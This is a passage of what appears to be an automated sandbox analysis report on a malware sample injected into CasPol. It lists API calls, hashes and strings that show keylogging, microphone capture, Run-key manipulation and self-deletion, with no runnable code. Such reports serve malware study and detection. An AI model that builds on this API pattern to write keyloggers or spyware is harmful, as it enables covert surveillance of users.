                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                              • String ID:
                                                                              • API String ID: 737400349-0
                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                              • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 3919263394-0
                                                                              • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                              • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleOpenProcess
                                                                              • String ID:
                                                                              • API String ID: 39102293-0
                                                                              • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                              • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                              • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                              • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              • API String ID: 3213639722-2276729525
                                                                              • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                              • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                              • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                              • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventTick
                                                                              • String ID: >G
                                                                              • API String ID: 180926312-1296849874
                                                                              • Opcode ID: 6401d42dd33bc85033f6d58232cebef360aba41b2605798a1f3a2cc9e6f90da7
                                                                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                              • Opcode Fuzzy Hash: 6401d42dd33bc85033f6d58232cebef360aba41b2605798a1f3a2cc9e6f90da7
                                                                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $fD
                                                                              • API String ID: 1807457897-3092946448
                                                                              • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                              • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 0-711371036
                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              • API String ID: 481472006-1507639952
                                                                              • Opcode ID: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                              • Opcode Fuzzy Hash: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                              • API String ID: 481472006-2430845779
                                                                              • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                              • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                              APIs
                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExistsFilePath
                                                                              • String ID: alarm.wav$xIG
                                                                              • API String ID: 1174141254-4080756945
                                                                              • Opcode ID: 319363a0a98ecc91b18a03f0251e716ffd11e5954bb7b3f8cb3ebdf27e687e2f
                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                              • Opcode Fuzzy Hash: 319363a0a98ecc91b18a03f0251e716ffd11e5954bb7b3f8cb3ebdf27e687e2f
                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                              APIs
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                              • String ID: Online Keylogger Stopped
                                                                              • API String ID: 1623830855-1496645233
                                                                              • Opcode ID: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                              • Opcode Fuzzy Hash: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                              APIs
                                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferHeaderPrepare
                                                                              • String ID: T=G
                                                                              • API String ID: 2315374483-379896819
                                                                              • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                              • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                              APIs
                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocaleValid
                                                                              • String ID: IsValidLocaleName$j=D
                                                                              • API String ID: 1901932003-3128777819
                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: T=G$T=G
                                                                              • API String ID: 3519838083-3732185208
                                                                              • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                              • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                              APIs
                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                              • String ID: [AltL]$[AltR]
                                                                              • API String ID: 2738857842-2658077756
                                                                              • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                              • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00448825
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast_free
                                                                              • String ID: `@$`@
                                                                              • API String ID: 1353095263-20545824
                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                              APIs
                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State
                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                              • API String ID: 1649606143-2446555240
                                                                              • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                              • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteOpenValue
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                              • API String ID: 2654517830-1051519024
                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteDirectoryFileRemove
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3325800564-4028850238
                                                                              • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                              • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                              APIs
                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 1872346434-4028850238
                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1717984340-0
                                                                              • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                              • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759